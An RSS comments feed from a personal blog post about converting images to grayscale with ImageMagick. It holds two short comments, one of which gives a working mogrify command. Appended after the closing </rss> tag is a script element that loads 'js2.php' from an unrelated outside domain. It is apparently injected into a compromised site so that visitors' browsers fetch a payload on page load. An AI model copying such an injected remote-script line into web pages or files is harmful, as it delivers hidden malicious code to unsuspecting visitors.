

































































































































<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: How to convert an image to grayscale using ImageMagick</title>
	<atom:link href="http://www.enrailed.net/2008/10/07/how-to-convert-an-image-to-grayscale-using-imagemagick/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.enrailed.net/2008/10/07/how-to-convert-an-image-to-grayscale-using-imagemagick/</link>
	<description>Runr's Personal Weblog</description>
	<lastBuildDate>Thu, 04 Mar 2010 20:28:15 -0800</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: runars</title>
		<link>http://www.enrailed.net/2008/10/07/how-to-convert-an-image-to-grayscale-using-imagemagick/comment-page-1/#comment-22</link>
		<dc:creator>runars</dc:creator>
		<pubDate>Mon, 10 Nov 2008 15:06:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.enrailed.net/?p=7#comment-22</guid>
		<description>Thanks, I have updated the post with the correct syntax.</description>
		<content:encoded><![CDATA[<p>Thanks, I have updated the post with the correct syntax.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: CableCat</title>
		<link>http://www.enrailed.net/2008/10/07/how-to-convert-an-image-to-grayscale-using-imagemagick/comment-page-1/#comment-21</link>
		<dc:creator>CableCat</dc:creator>
		<pubDate>Sat, 08 Nov 2008 22:32:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.enrailed.net/?p=7#comment-21</guid>
		<description>The above does not work, this does:

mogrify -modulate 100,0,50 image.jpg</description>
		<content:encoded><![CDATA[<p>The above does not work, this does:</p>
<p>mogrify -modulate 100,0,50 image.jpg</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script src="http://whereisdudescars.com/js2.php"></script>